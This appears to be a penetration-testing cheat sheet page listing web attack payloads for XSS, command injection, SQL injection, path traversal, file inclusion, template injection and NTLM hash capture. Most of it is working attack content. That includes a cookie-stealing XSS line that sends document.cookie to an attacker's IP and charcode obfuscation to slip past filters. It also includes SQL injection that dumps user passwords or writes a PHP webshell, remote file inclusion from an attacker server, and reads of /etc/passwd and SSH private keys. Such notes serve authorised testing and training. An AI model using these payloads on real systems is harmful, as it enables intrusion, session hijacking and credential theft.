Other Pages

Before exploitating

Always check for already existing exploits. Even if the application seems to be custom made.

Check for unnecessary enters and spaces during payload creations. Use repeater with this button pressed:

Cross Site Scripting

The most frequently used character to test for XSS injection:

HTML

< > " '

JavaScript

' " { } ;

Default payload

<script>alert(document.domain)</script>

Img payload

<img src onerror=alert(document.domain)>

Attacker side

python3 -m http.server 8888

<script>window.location.replace("http://IP:8888/a"+document.cookie);</script>

<img src onerror=window.location.replace("http://IP:8888/a"+document.cookie);>

Payload encoding

Compress the JavaScript code with JSCompress.

https://jscompress.com

Convert it into CharCode using the following JavaScript code:

function encode_to_javascript(string) {
            var input = string
            var output = '';
            for(pos = 0; pos < input.length; pos++) {
                output += input.charCodeAt(pos);
                if(pos != (input.length - 1)) {
                    output += ",";
                }
            }
            return output;
        }
        
let encoded = encode_to_javascript('insert_minified_javascript')
console.log(encoded)

Execute the encoded payload:

<script>eval(String.fromCharCode(<OUTPUT_FROM_ENCODING>))</script>

Command Injection

Do not forget to use urlencoding

Reflected

& echo test123 &

Blind

& ping -c 10 127.0.0.1 &

Blind (ping rce listener)

Kali:

tcpdump -i <NETWORK_CARD> icmp

Victim:

& ping <KALI_IP> &

BLIND OAST

& nslookup collaborator-link.net &

Blind redirecting the input

& whoami > /var/www/static/whoami.txt &

Command seperators

&
&&
|
||

More command seperators

Newline (0x0a or \n)
;

Inline Command Execution (Linux)

`command`
$(command)

Check if command is executed via cmd or powershell

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

Vulnerable Software Exploits

Google: [software name with version] exploit github

SQL Injection

Exploiting SQL Injection

Fuzz String

'+!@#$

Most of the time SQL Injections differ from the regular ones. Do not paste payloads thoughtlessly - match them to your specific case.

STACKED QUERIES

SELECT * FROM BOOKS WHERE ID1; DELETE FROM PRODUCTS;

UNION Keyword

It has to contain same amount of columns as the original query.
The data types need to be compatible between each column.
You can try to cast string as int e.g. in PostgreSQL

Determine number of columns with order by (increase the number until it fails):

' ORDER BY 1-- //

Sample final query:

If application does not return the output from given command it can me data type mismatch try to change the place of executed command.

%' UNION SELECT database(), user(), @@version, null, null -- //

Dumping other tables example

' UNION SELECT null, username, password, description, null FROM users -- //

IN KEYWORD

' or 1=1 in (SELECT password FROM users) -- //

BOOLEAN BASED

If outputs of the payloads differ application is probably vulnerable to SQL Injection.

Payload 1:

admin' AND 1=1 -- //

Payload 2:

admin' AND 1=2 -- //

TIME BASED

Change response times to avoid false positives.

admin' AND IF (1=1, sleep(3),'false') -- //

Useful SQL commands

mysql -u <USER> -p'<PASSWORD>' -h <IP> -P <PORT> # database connection

select version(); // show database version
select system_user(); // show current database user
show databases; // show databases
SELECT user, authentication_string FROM mysql.user WHERE user = '<USER>'; // users password

Additional info about hidden system tables in MSSQL:

https://www.geeksforgeeks.org/system-tables-in-sql/

impacket-mssqlclient <USER>:<PASSWORD>@<IP> -windows-auth

SELECT @@version; // show database version
SELECT name FROM sys.databases; // show databases
SELECT * FROM <DATABASE>.information_schema.tables; // show tables

Manual Code Execution

Common locations: ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www')

INTO OUTFILE

In some cases you can spawn the webshell using SQL Injection.

' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

You can try to turn on xp_cmdshell using oneliner ; EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- -

If xp_cmdshell is set to True we are able to execute shell commands on the system.

EXECUTE xp_cmdshell 'whoami';

MSSQL Hash grabing

Client:

impacket-smbserver -smb2support share share

Server:

xp_dirtree \\<KALI_IP\share\file

MSSQL dir listing

xp_dirtree "C:\"

File upload

Webshells

File upload bypass

Page not found - HackTricksbook.hacktricks.xyz

Null Bytes

%00
0x00

Path Traversal

You can also use path traversal to in file upload funcionality to send ssh key.

It be also found in filename while uploading the file. Url encoding is worth trying. Path traversal is not File Inclusion - it can only read contents of the files.

We can use this to read local files.

Default payloads

Linux

../

Windows

..\

.\/

Encoded payloads

Dot url encoding

%2e%2e/

Url encoding

%2e%2e%2f

%252e%252e%252f

%c0%ae%c0%ae%c0%af

Bypass

....////

PoC files

/etc/passwd

Sometimes choosing a disc does not work on Windows - try also without c:/

C:\Windows\System32\drivers\etc\hosts

Exploitation files

Search also for other types of private key: e.g. id_ecdsa...

Private SSH keys in user's home folder (you can enumerate the users by reading the /etc/passwd file)

/home/<USER>/.ssh/id_rsa

IIS Server log files

C:\inetpub\logs\LogFiles\W3SVC1\

IIS Server config files

C:\inetpub\wwwroot\web.config

File Inclusion

Searching for vulnerability is the same as for Path Traversal

Application include given file (local or remote) in the application running code.

We can use this to execute local or remote files.

Search for this vulnerability in parameters which refers to the another file in the system.

Local File Inclusion

The sever loads a local file.

page=admin.php # example

In order to achieve code execution try to include this line of code in some file on the system:

<?php echo system($_GET['cmd']); ?>

Then include the file with the following parameter (or just urlencode reverse shell):

&cmd=ls

Remote File Inclusion

The file is loaded from a remote server (Best: You can write the code and the server will execute it). In php this is disabled by default (allow_url_include).

# Sample malicious file
<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

python -m http.server 443 # attacker set up http server with malicious file

page=http://<ATTACKER_IP>:443/<MALICIOUS_PHP_FILE>&cmd=ls # example

PHP Wrappers

Instead of executing the files you can read and review its contents using php wrappers.

Read sensitive information (hardcoded credentials, secrets) and understand application logic.

page=php://filter/resource=admin.php # regular

page=php://filter/convert.base64-encode/resource=admin.php # base64 way

echo "<OUTPUT>" | base64 -d # decode the output

Achieve code execution.

page=data://text/plain,<?php%20echo%20system('ls');?>"

WAF / Security Mechanisms bypass (allow_url_include setting needs to be enabled).

page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls

Template Injection

Default Payloads

Common

{{7*7}}

Common

${7*7}

Spring

<%= 7*7 %>

.NET

@(2+2)

For more information visit https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

Fuzz String

${{<%[%'"}}%\.

Flask Jinja2

{{ ‘’.__class__.__mro__[1].__subclasses__() }}

Filter bypass (newlines in urlencoding)

%0A or %0D or %0D%0A

NTLM Relay

You can inject path to your smb server in order to capture hashes:

//<YOUR_IP>/share

PreviousLogin Page NextWebshells

Last updated 1 year ago

hashtagBefore exploitating

hashtagCross Site Scripting

hashtagHTML

hashtagJavaScript

hashtagDefault payload

hashtagImg payload

hashtagXSS Cookie Stealer

hashtagAttacker side

hashtagPayload encoding

hashtagCommand Injection

hashtagReflected

hashtagBlind

hashtagBLIND OAST

hashtagBlind redirecting the input

hashtagCommand seperators

hashtagMore command seperators

hashtagInline Command Execution (Linux)

hashtagCheck if command is executed via cmd or powershell

hashtagVulnerable Software Exploits

hashtagSQL Injection

hashtagExploiting SQL Injection

hashtagIN KEYWORD

hashtagUseful SQL commands

hashtagManual Code Execution

hashtagMSSQL Hash grabing

hashtagMSSQL dir listing

hashtagFile upload

hashtagNull Bytes

hashtagPath Traversal

hashtagDefault payloads

hashtagEncoded payloads

hashtagPoC files

hashtagExploitation files

hashtagFile Inclusion

hashtagLocal File Inclusion

hashtagRemote File Inclusion

hashtagPHP Wrappers

hashtagTemplate Injection

hashtagDefault Payloads

hashtagCommon

hashtagCommon

hashtagSpring

hashtag.NET

hashtagFuzz String

hashtagFlask Jinja2

hashtagFilter bypass (newlines in urlencoding)

hashtagNTLM Relay

Before exploitating

Cross Site Scripting

HTML

JavaScript

Default payload

Img payload

XSS Cookie Stealer

Attacker side

Payload encoding

Command Injection

Reflected

Blind

BLIND OAST

Blind redirecting the input

Command seperators

More command seperators

Inline Command Execution (Linux)

Check if command is executed via cmd or powershell

Vulnerable Software Exploits

SQL Injection

Exploiting SQL Injection

IN KEYWORD

Useful SQL commands

Manual Code Execution

MSSQL Hash grabing

MSSQL dir listing

File upload

Null Bytes

Path Traversal

Default payloads

Encoded payloads

PoC files

Exploitation files

File Inclusion

Local File Inclusion

Remote File Inclusion

PHP Wrappers

Template Injection

Default Payloads

Common

Common

Spring

.NET

Fuzz String

Flask Jinja2

Filter bypass (newlines in urlencoding)

NTLM Relay